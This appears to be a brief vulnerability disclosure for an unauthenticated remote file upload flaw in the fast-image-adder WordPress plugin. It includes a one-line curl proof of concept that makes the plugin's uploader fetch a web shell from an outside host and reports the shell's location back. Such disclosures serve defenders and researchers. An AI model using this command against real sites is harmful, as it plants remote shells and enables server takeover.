The fast-image-adder WordPress plugin was affected by an Unauthenticated Remote File Upload security vulnerability.
$ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://sitewithshellstodl/shell.php
Shell location is reported back to the user with random filename.